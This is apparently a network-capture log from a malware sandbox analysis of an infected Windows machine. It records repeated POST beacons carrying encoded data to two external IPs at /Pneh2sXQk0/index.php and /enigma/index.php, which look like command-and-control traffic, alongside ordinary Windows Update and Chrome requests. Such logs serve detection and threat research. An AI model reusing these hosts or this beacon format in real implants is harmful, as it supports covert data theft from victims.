Session ID: 1575 | Source IP: 192.168.2.5 | Source Port: 51432 | Destination IP: 193.233.132.56 | Destination Port: 80
Timestamp: Apr 19, 2024 03:37:11.775744915 CEST | Bytes transferred: 312 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Timestamp: Apr 19, 2024 03:37:12.024138927 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 1576 | Source IP: 192.168.2.5 | Source Port: 51433 | Destination IP: 193.233.132.167 | Destination Port: 80
Timestamp: Apr 19, 2024 03:37:11.877244949 CEST | Bytes transferred: 309 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Timestamp: Apr 19, 2024 03:37:12.130733013 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 1577 | Source IP: 192.168.2.5 | Source Port: 51434 | Destination IP: 193.233.132.56 | Destination Port: 80
Timestamp: Apr 19, 2024 03:37:12.359199047 CEST | Bytes transferred: 158 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:37:12.608380079 CEST | Bytes transferred: 219 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID: 1578 | Source IP: 192.168.2.5 | Source Port: 51435 | Destination IP: 193.233.132.167 | Destination Port: 80
Timestamp: Apr 19, 2024 03:37:12.461499929 CEST | Bytes transferred: 155 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:37:12.705215931 CEST | Bytes transferred: 197 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID: 1579 | Source IP: 192.168.2.5 | Source Port: 51436 | Destination IP: 193.233.132.56 | Destination Port: 80
Timestamp: Apr 19, 2024 03:37:12.863676071 CEST | Bytes transferred: 312 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Timestamp: Apr 19, 2024 03:37:13.123030901 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1580 | 192.168.2.5 | 51437 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:12.953463078 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:37:13.203063011 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1581 | 192.168.2.5 | 51438 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:13.447899103 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:37:13.695905924 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1582 | 192.168.2.5 | 51439 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:13.535720110 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:37:13.779119968 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1583 | 192.168.2.5 | 51440 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:13.943561077 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:37:14.189446926 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1584 | 192.168.2.5 | 51441 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:14.027424097 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:37:14.277661085 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1585 | 192.168.2.5 | 51442 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:14.510479927 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:37:14.759174109 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1586 | 192.168.2.5 | 51443 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:14.617121935 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:37:14.865086079 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1587 | 192.168.2.5 | 51444 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:15.012197971 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:37:15.266007900 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1588 | 192.168.2.5 | 51445 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:15.118655920 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:37:15.372178078 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 13.85.23.86 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:28:14 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=YVSahsnONFm9PMs&MD=We8PUgeO HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                      Host: slscr.update.microsoft.com
2024-04-19 01:28:15 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                      MS-CorrelationId: b39d04e5-6196-4d38-b40e-824777f16803
                                                                                                                                                                                                                                      MS-RequestId: 9bbf82f9-f129-4af0-beb0-a1c7bab85e58
                                                                                                                                                                                                                                      MS-CV: 6e7UWksuU0CnpPv3.0
                                                                                                                                                                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:28:14 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 24490


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49712 | 13.85.23.86 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:28:53 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=YVSahsnONFm9PMs&MD=We8PUgeO HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                      Host: slscr.update.microsoft.com
2024-04-19 01:28:53 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                      ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                                                                                                                                                      MS-CorrelationId: 9bcbd3cc-de13-48cf-8002-f854d8109664
                                                                                                                                                                                                                                      MS-RequestId: 72147229-14ef-42ae-a6e1-c407b04c8331
                                                                                                                                                                                                                                      MS-CV: JkU2a/ndMECeVuo9.0
                                                                                                                                                                                                                                      X-Microsoft-SLSClientCache: 2160
                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:28:52 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 25457


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49725 | 64.233.185.136 | 443 | 2956 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:16 UTC | 810 | OUT | GET /account HTTP/1.1
                                                                                                                                                                                                                                      Host: www.youtube.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                      X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
2024-04-19 01:29:17 UTC | 2428 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
